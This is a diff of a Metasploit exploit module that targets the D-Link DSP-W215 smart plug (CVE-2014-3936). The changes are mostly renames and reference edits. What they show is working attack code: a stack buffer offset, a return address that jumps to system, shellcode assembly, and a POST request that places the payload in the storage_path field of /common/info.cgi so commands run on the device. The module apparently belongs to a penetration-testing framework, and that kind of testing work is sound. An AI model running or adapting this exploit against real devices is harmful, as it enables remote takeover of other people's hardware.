@@ -24,26 +24,23 @@ def initialize(info = {})
24
24
'Michael Messner <devnull[at]s3cur1ty.de>' , # Metasploit module
25
25
] ,
26
26
'License' => MSF_LICENSE ,
27
- 'Platform' => [ 'linux' ] ,
27
+ 'Platform' => 'linux' ,
28
28
'Arch' => ARCH_MIPSBE ,
29
29
'References' =>
30
30
[
31
- [ 'CVE' , '2014-3936' ] ,
32
- [ 'BID' , '67651' ] ,
33
- [ 'URL' , 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/' ] , # blog post from Craig including PoC
34
- [ 'URL' , 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
31
+ [ 'OSVDB' , '108249' ] ,
32
+ [ 'URL' , 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/' ] # blog post from Craig including PoC
35
33
] ,
36
34
'Targets' =>
37
35
[
38
36
#
39
37
# Automatic targeting via fingerprinting
40
38
#
41
39
[ 'Automatic Targeting' , { 'auto' => true } ] ,
42
-
43
40
[ 'D-Link DSP-W215 - v1.02' ,
44
41
{
45
- 'Offset' => 477472 ,
46
- 'Ret' => "\x00 \x40 \x5C \xEC " , # jump to system - my_cgi.cgi
42
+ 'Offset' => 477472 ,
43
+ 'Ret' => "\x00 \x40 \x5C \xEC " # jump to system - my_cgi.cgi
47
44
}
48
45
]
49
46
] ,
@@ -57,6 +54,7 @@ def check
57
54
'uri' => "/common/info.cgi" ,
58
55
'method' => 'GET'
59
56
} )
57
+
60
58
if res && [ 200 , 301 , 302 ] . include? ( res . code )
61
59
62
60
# trying to automatically detect a vulnerable device
@@ -67,7 +65,7 @@ def check
67
65
68
66
self . targets . each do |t |
69
67
if ( t . name =~ /DSP-W215.*1.02/ ) then
70
- @mytarget = t
68
+ @my_target = t
71
69
break
72
70
end
73
71
end
@@ -95,16 +93,11 @@ def check
95
93
Exploit ::CheckCode ::Unknown
96
94
end
97
95
98
- def target
99
- return @mytarget if @mytarget
100
- super
101
- end
102
-
103
96
def exploit
104
97
print_status ( "#{ peer } - Trying to access the vulnerable URL..." )
105
98
106
99
# Use a copy of the target
107
- @mytarget = target
100
+ @my_target = target
108
101
109
102
unless check == Exploit ::CheckCode ::Detected
110
103
fail_with ( Failure ::Unknown , "#{ peer } - Failed to access the vulnerable URL" )
@@ -118,8 +111,8 @@ def exploit
118
111
end
119
112
120
113
def prepare_shellcode ( cmd )
121
- buf = rand_text_alpha_upper ( @mytarget [ 'Offset' ] ) # Stack filler
122
- buf << @mytarget [ 'Ret' ] # Overwrite $ra -> jump to system
114
+ buf = rand_text_alpha_upper ( @my_target [ 'Offset' ] ) # Stack filler
115
+ buf << @my_target . ret # Overwrite $ra -> jump to system
123
116
124
117
# la $t9, system
125
118
# la $s1, 0x440000
@@ -136,10 +129,10 @@ def execute_command(cmd, opts)
136
129
137
130
begin
138
131
res = send_request_cgi ( {
139
- 'method' => 'POST' ,
140
- 'uri' => "/common/info.cgi" ,
132
+ 'method' => 'POST' ,
133
+ 'uri' => "/common/info.cgi" ,
141
134
'encode_params' => false ,
142
- 'vars_post' => {
135
+ 'vars_post' => {
143
136
'storage_path' => shellcode ,
144
137
}
145
138
} )
0 commit comments